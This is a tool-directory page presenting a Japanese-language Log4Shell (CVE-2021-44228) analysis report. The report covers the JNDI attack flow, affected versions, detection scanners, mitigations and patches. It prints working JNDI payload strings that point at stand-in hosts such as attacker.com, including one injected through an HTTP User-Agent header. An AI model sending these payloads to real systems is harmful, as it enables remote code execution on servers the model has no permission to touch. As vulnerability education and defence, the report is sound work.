Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4shell — CVE-2021-44228 | Kitploit
ツール/GitHubGitHub/tpdlshdmlrkfmcla/log4shell
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト論文と研究学習と教育
GitHubtpdlshdmlrkfmcla/log4shell

Log4shell

CVE-2021-44228

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

이글루코퍼레이션 원치현 Log4shell 分析レポート

Log4shell

CVE-2021-44228 Log4j は Apache ソフトウェア財団の無料オープンソースで、Java ベースのあらゆるアプリケーションで使用可能。様々な Java ベースのサービスのログ記録、JNDI データ及びオブジェクトを発見・参照するための Java LDAP 1389 Lookup。JNDI を介して見つけたリソースを使用する機能

脆弱サーバー起動用 Docker イメージファイルのダウンロード

root@kitploit:~
sudo git clone 
sudo docker build . -t vulnerable-app

新しく作成するイメージを vulnerable-app として、現在のディレクトリに Docker イメージをビルド作成

github.com/welk

未使用の脆弱なサーバーを終了

root@kitploit:~
docker ps -a

実行中の Docker イメージ全体を確認

root@kitploit:~
docker container ID を確認

Log4Shell (CVE-2021-44228) 分析レポート

1. 概要

Log4Shell(CVE-2021-44228)は Apache Log4j ライブラリで発見されたリモートコード実行(RCE)脆弱性です。
攻撃者は悪意のあるペイロードを使用して
任意のコードを実行
できる可能性があり、広範囲にわたる被害をもたらす可能性があります。


2. 脆弱性概要

項目説明
脆弱性名Log4Shell
CVE番号CVE-2021-44228
脆弱性の種類リモートコード実行(RCE)
影響を受けるバージョンLog4j 2.0-beta9 ~ 2.14.1
パッチ適用済みバージョンLog4j 2.15.0 以上
攻撃難易度低 (簡単な文字列入力のみで悪用可能)
深刻度🔥 致命的 (CVSS 10.0)

3. 脆弱性の原理

Log4Shell は JNDI(Java Naming and Directory Interface)ルックアップ機能の脆弱性を利用して、攻撃者がリモートサーバーで悪意のあるコードを実行できるようにします。

3.1 攻撃の流れ

  1. 攻撃者は悪意のある文字列を含むログメッセージをアプリケーションに送信する。
  2. Log4j がログを記録する過程で JNDI Lookup を実行する。
  3. JNDI が LDAP、RMI などのリモートサーバーからデータを検索する。
  4. 攻撃者のサーバーで悪意のある Java クラスをロードし実行する。
  5. リモートコード実行 (RCE) が発生する。

3.2 攻撃コード例

攻撃者は以下のような文字列をログに残すだけで脆弱性を悪用できます。

root@kitploit:~
${jndi:ldap://attacker.com:1389/exploit}

4. 影響範囲

Log4Shell 脆弱性は Log4j を使用する多くの企業やサービスに影響を与えました。

4.1 脆弱な主要サービスおよびシステム

  • クラウドサービス: AWS、Google Cloud、Microsoft Azure
  • エンタープライズアプリケーション: Apache Struts、ElasticSearch、VMware vCenter
  • ゲームサーバー: Minecraft、Steam
  • 各種ウェブアプリケーション及びサーバー: Spring Boot、Tomcat など

5. 悪用事例及び攻撃例

5.1 Minecraft サーバー攻撃

攻撃者は Minecraft のチャットウィンドウに以下の文字列を入力することでサーバーを掌握できました。

root@kitploit:~
복사
편집
${jndi:ldap://attacker.com:1389/exploit}

サーバーがこれをログに記録すると、JNDI Lookup を介して攻撃者のサーバーで悪意のあるコードが実行されます。

5.2 ウェブアプリケーション攻撃

HTTP リクエストの User-Agent、Referer、X-Forwarded-For など、ログに記録されるフィールドに悪意のあるペイロードを挿入します。

root@kitploit:~
복사
편집
GET / HTTP/1.1
Host: victim.com
User-Agent: ${jndi:ldap://malicious.com:1389/exploit}

6. 検知及び対応方法

6.1 脆弱性検知方法

✅ セキュリティスキャナーの活用

  • log4j-scan (https://github.com/fullhunt/log4j-scan)
  • log4shell-detector (https://github.com/Neo23x0/log4shell-detector)

✅ ログファイルの確認

  • ログに ${jndi:ldap://...} のようなパターンが見つかった場合は即座に対応が必要。

✅ ネットワーク監視

  • 異常な LDAP、RMI リクエストがないか確認。

6.2 対応方法

✅ 即時対策

  • Log4j 2.15.0 以上のバージョンにアップグレード。
  • Java 実行時に環境変数を設定:
root@kitploit:~
복사
편집
-Dlog4j2.formatMsgNoLookups=true
  • ファイアウォールおよび IDS/IPS で jndi:ldap:// パターンをブロック。

✅ 長期的なセキュリティ対策

  • JNDI の使用制限とセキュリティポリシーの強化。
  • WAF(Web Application Firewall)の適用。
  • 定期的なセキュリティチェックと脆弱性スキャンの実施。

7. パッチ及び解決方法

Log4j バージョン対応措置
2.0-beta9 ~ 2.14.1脆弱、アップデートが必要
2.15.0デフォルトで JNDI Lookup を無効化
2.16.0JNDI 機能を完全に削除
2.17.0追加のセキュリティ強化措置

✅ 最新バージョン(2.17.1 以上)へのアップデートを推奨!

8. 結論

Log4Shell(CVE-2021-44228)は近年最も深刻なセキュリティ脆弱性の一つと評価されています。 ✅ 脆弱なシステムを迅速にパッチし、継続的なセキュリティ監視を実施することが必須です。 ✅ Log4j を使用するすべてのアプリケーションでセキュリティチェックを実施する必要があります。

9. 参考資料

  • Apache Log4j 公式セキュリティ勧告
  • NIST National Vulnerability Database (CVE-2021-44228)
  • log4j-scan (GitHub)
ツールをダウンロード